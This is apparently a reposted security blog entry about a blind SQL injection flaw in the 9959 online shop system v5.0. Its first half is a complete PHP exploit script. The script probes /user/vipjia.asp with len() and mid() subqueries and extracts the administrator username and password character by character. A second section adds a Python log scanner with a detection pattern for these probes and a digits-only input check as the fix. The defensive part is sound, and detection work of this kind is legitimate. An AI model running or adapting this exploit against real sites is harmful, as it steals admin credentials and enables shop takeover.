9959网店系统 (9959 online shop system) v5.0 blind SQL injection vulnerability
The exploit tool follows:
<?php
print_r('+---------------------------------------------------------------+
9959网店系统 v5.0
Blind SQL injection exploit by mendou
05
官方网站: www.9959shop.com
+---------------------------------------------------------------+
');
// host and id are both required (argv[1] and argv[2])
if ($argc < 3) {
    print_r('
+---------------------------------------------------------------+
Usage: php '.$argv[0].' host id
Example:
php '.$argv[0].' localhost id
+---------------------------------------------------------------+
');
    exit;
}
error_reporting(0);
ini_set('max_execution_time', 0);
$host   = $argv[1];
$str    = "abcdefghijklmnopqrstuvwxyz0123456789"; // candidate character set
$strlen = strlen($str);
$pid    = $argv[2];                                 // a valid numeric id to append the condition to

$n_len = lenstr('adminname'); // username length
echo "用户长度:".$n_len."\r\n";
pojie("adminname", $n_len);
echo "\r\n";

$p_len = lenstr('password'); // password length
echo "密码长度:".$p_len."\r\n";
pojie("password", $p_len);

// extract column $str1 from hu_admin one character at a time
function pojie($str1, $len) {
    global $host, $strlen, $str, $pid;
    for ($j = 1; $j <= $len; $j++) {
        for ($i = 0; $i < $strlen; $i++) {
            $exp = "%20and%20(select%20top%201%20mid(".$str1.",".$j.",1)%20from%20hu_admin)='".$str[$i]."'";
            $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
            // boolean-blind oracle: the page contains "次" only when the injected condition is true
            if (strpos($a, "次") !== false) {
                echo $str[$i];
                break;
            }
        }
    }
}

// function to determine the length of the username or password
function lenstr($str) {
    global $host, $pid;
    for ($i = 1; $i <= 30; $i++) {
        $exp = "%20and%20(select%20top%201%20len(".$str.")%20from%20hu_admin)=".$i;
        $a = file_get_contents('http://'.$host.'/user/vipjia.asp?action=loads&id='.$pid.$exp);
        if (strpos($a, "次") !== false) {
            return $i;
        }
    }
}
?>
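From the defender's side, the request pattern above is easy to recognise in web-server logs, and the root cause is that the numeric id parameter is concatenated into the query unchecked. The following Python script is an added example (not code from the page or from the 9959 product): it parses a few constructed IIS-style W3C log lines, flags requests to /user/vipjia.asp whose id parameter is not a plain integer, labels the ones carrying the "and (select top 1 len(...)/mid(...)" boolean-blind subquery, and shows the input check (id must be digits only) that the endpoint should apply before the value ever reaches SQL. The log format, IP-less field layout and all log lines are assumptions made for the example.

```python
"""Detect the boolean-blind injection pattern used against
/user/vipjia.asp?action=loads&id=... in web-server logs and show the
input check that blocks it.  Added example; the log lines below are
constructed (IIS W3C style: date time method uri-stem uri-query status)."""
import re
from urllib.parse import unquote_plus

# Constructed sample log lines (assumption: 6 space-separated fields).
SAMPLE_LOG = """\
2010-01-01 10:00:01 GET /user/vipjia.asp action=loads&id=12 200
2010-01-01 10:00:02 GET /user/vipjia.asp action=loads&id=12%20and%20(select%20top%201%20len(adminname)%20from%20hu_admin)=5 200
2010-01-01 10:00:03 GET /user/vipjia.asp action=loads&id=12%20and%20(select%20top%201%20mid(password,1,1)%20from%20hu_admin)='a' 200
2010-01-01 10:00:04 GET /index.asp - 200
2010-01-01 10:00:05 GET /user/vipjia.asp action=loads&id=12%27 500
2010-01-01 10:00:06 GET /user/vipjia.asp action=loads&id=13 200
"""

# The subquery shape the exploit appends to a valid id (len() or mid() probes).
BLIND_SQLI = re.compile(
    r"\band\b\s*\(\s*select\s+top\s+1\s+(len|mid)\s*\(", re.IGNORECASE)

ID_PARAM = re.compile(r"(?:^|&)id=([^&]*)")


def is_valid_id(raw: str) -> bool:
    """The check the endpoint should apply: id must be a plain integer.
    Anything else (quotes, spaces, keywords) is rejected before any SQL runs."""
    return raw.isdigit()


def parse_line(line: str):
    """Split one constructed W3C-style log line into a dict, or None if malformed."""
    parts = line.split(" ")
    if len(parts) != 6:
        return None
    date, time, method, stem, query, status = parts
    return {"date": date, "time": time, "method": method,
            "stem": stem, "query": query, "status": status}


def scan_log(text: str):
    """Return (time, kind, decoded_id) for every suspicious request.

    kind is 'blind-sqli' when the id carries the len()/mid() subquery,
    'malformed-id' for any other non-numeric id (quotes, junk, ...)."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None or rec["stem"].lower() != "/user/vipjia.asp":
            continue
        m = ID_PARAM.search(rec["query"])
        if not m:
            continue
        raw_id = unquote_plus(m.group(1))      # %20 -> space, %27 -> quote
        if is_valid_id(raw_id):
            continue                           # benign numeric request
        kind = "blind-sqli" if BLIND_SQLI.search(raw_id) else "malformed-id"
        hits.append((rec["time"], kind, raw_id))
    return hits


if __name__ == "__main__":
    for when, kind, value in scan_log(SAMPLE_LOG):
        print(f"{when} {kind:12s} id={value!r}")
```

Running the script prints the two exploit probes as blind-sqli and the stray quote as malformed-id; the benign requests with numeric ids produce nothing. In the application itself, the same `is_valid_id` test (or, better, a parameterised query) at the point where id is read is what removes the injection entirely; the log scan only tells you that someone tried.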
Please credit WebShell'S Blog when reprinting; original URL: https://www.webshell.cc/1189.html